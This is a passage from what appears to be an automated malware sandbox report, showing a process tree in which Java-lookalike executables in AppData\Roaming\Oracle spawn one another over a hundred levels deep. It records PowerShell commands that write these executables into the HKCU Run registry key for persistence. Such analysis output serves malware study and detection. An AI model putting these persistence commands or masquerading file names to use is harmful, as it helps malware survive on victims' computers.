      C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
      4⤵
      PID:9320
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        5⤵
        
        PID:9508
      - C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_update.exe"
        6⤵
        Modifies registry key
        
        PID:9576
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_update.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe\"'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe"
1⤵
PID:10136
- C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
  2⤵
  PID:10440
- - C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
    3⤵
    PID:10748
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
      4⤵
      PID:11024
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        5⤵
        
        PID:11200
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        6⤵
        
        PID:11300
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_platform.exe"
        7⤵
        Modifies registry key
        
        PID:11412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe\"'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11616

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:12048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe"
1⤵
PID:13024
- C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
  2⤵
  PID:13268
- - C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
    3⤵
    PID:3528
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
      4⤵
      PID:13396
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        5⤵
        
        PID:13548
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        6⤵
        
        PID:13684
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        7⤵
        
        PID:13824
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        8⤵
        
        PID:13940
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        9⤵
        
        PID:3912
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        10⤵
        
        PID:14140
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        11⤵
        
        PID:14208
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        12⤵
        
        PID:2336
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        13⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        14⤵
        
        PID:5472
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        15⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        16⤵
        
        PID:1700
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        17⤵
        
        PID:5652
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        18⤵
        
        PID:5784
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        19⤵
        
        PID:2732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        20⤵
        
        PID:5820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        21⤵
        
        PID:3028
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        22⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        23⤵
        
        PID:980
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        24⤵
        
        PID:14304
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        25⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        26⤵
        
        PID:6856
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        27⤵
        
        PID:6824
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        28⤵
        
        PID:8020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        29⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        30⤵
        
        PID:7836
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        31⤵
        
        PID:484
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        32⤵
        
        PID:8780
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        33⤵
        
        PID:9000
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        34⤵
        
        PID:9256
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        35⤵
        
        PID:4388
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        36⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        37⤵
        
        PID:9380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        38⤵
        
        PID:9736
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        39⤵
        
        PID:9904
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        40⤵
        
        PID:9760
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        41⤵
        
        PID:10020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        42⤵
        
        PID:10292
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        43⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        44⤵
        
        PID:10472
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        45⤵
        
        PID:10644
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        46⤵
        
        PID:10612
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        47⤵
        
        PID:1996
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        48⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        49⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        50⤵
        
        PID:4920
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        51⤵
        
        PID:11496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        52⤵
        
        PID:11776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        53⤵
        
        PID:3748
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        54⤵
        
        PID:5888
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        55⤵
        
        PID:11804
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        56⤵
        
        PID:12036
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        57⤵
        
        PID:12156
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        58⤵
        
        PID:12276
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        59⤵
        
        PID:12352
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        60⤵
        
        PID:12416
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        61⤵
        
        PID:12556
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        62⤵
        
        PID:12676
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        63⤵
        
        PID:13076
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        64⤵
        
        PID:13460
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        65⤵
        
        PID:13668
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        66⤵
        
        PID:2144
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        67⤵
        
        PID:13964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        68⤵
        
        PID:14016
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        69⤵
        
        PID:14104
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        70⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        71⤵
        
        PID:5352
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        72⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        73⤵
        
        PID:5484
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        74⤵
        
        PID:5612
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        75⤵
        
        PID:5708
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        76⤵
        
        PID:5752
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        77⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        78⤵
        
        PID:5940
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        79⤵
        
        PID:6016
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        80⤵
        
        PID:1004
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        81⤵
        
        PID:6184
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        82⤵
        
        PID:6276
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        83⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        84⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        85⤵
        
        PID:6520
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        86⤵
        
        PID:6612
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        87⤵
        
        PID:6740
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        88⤵
        
        PID:6808
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        89⤵
        
        PID:6912
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        90⤵
        
        PID:6988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        91⤵
        
        PID:7060
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        92⤵
        
        PID:3460
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        93⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        94⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        95⤵
        
        PID:7256
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        96⤵
        
        PID:7264
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        97⤵
        
        PID:7376
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        98⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        99⤵
        
        PID:8008
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        100⤵
        
        PID:8160
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        101⤵
        
        PID:8224
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        102⤵
        
        PID:8324
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        103⤵
        
        PID:8400
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        104⤵
        
        PID:8552
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        105⤵
        
        PID:8944
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        106⤵
        
        PID:9288
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        107⤵
        
        PID:10088
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        108⤵
        
        PID:10144
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        109⤵
        
        PID:10372
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        110⤵
        
        PID:10584
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        111⤵
        
        PID:10656
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        112⤵
        
        PID:10724
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        113⤵
        
        PID:10820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        114⤵
        
        PID:10688
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        115⤵
        
        PID:11056
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        116⤵
        
        PID:11012
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        117⤵
        
        PID:11192
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        118⤵
        
        PID:11332
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        119⤵
        
        PID:11388
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        120⤵
        
        PID:11424
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        121⤵
        
        PID:11684
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        122⤵
        
        PID:12584
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        123⤵
        
        PID:12776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        124⤵
        
        PID:13096
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        125⤵
        
        PID:13588
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        126⤵
        
        PID:13272
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        127⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        128⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        129⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        130⤵
        
        PID:12624
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        131⤵
        
        PID:6280
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        132⤵
        
        PID:6348
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        133⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        134⤵
        
        PID:6996
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        135⤵
        
        PID:7388
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        136⤵
        
        PID:7396
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        137⤵
        
        PID:7632
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        138⤵
        
        PID:7852
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        139⤵
        
        PID:7604
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        140⤵
        
        PID:7856
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        141⤵
        
        PID:7948
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        142⤵
        
        PID:7804
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        143⤵
        
        PID:7900
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        144⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        145⤵
        
        PID:8760
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        146⤵
        
        PID:8660
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        147⤵
        
        PID:8964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        148⤵
        
        PID:8856
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        149⤵
        
        PID:9156
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        150⤵
        
        PID:9492
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        151⤵
        
        PID:9680
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        152⤵
        
        PID:9632
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
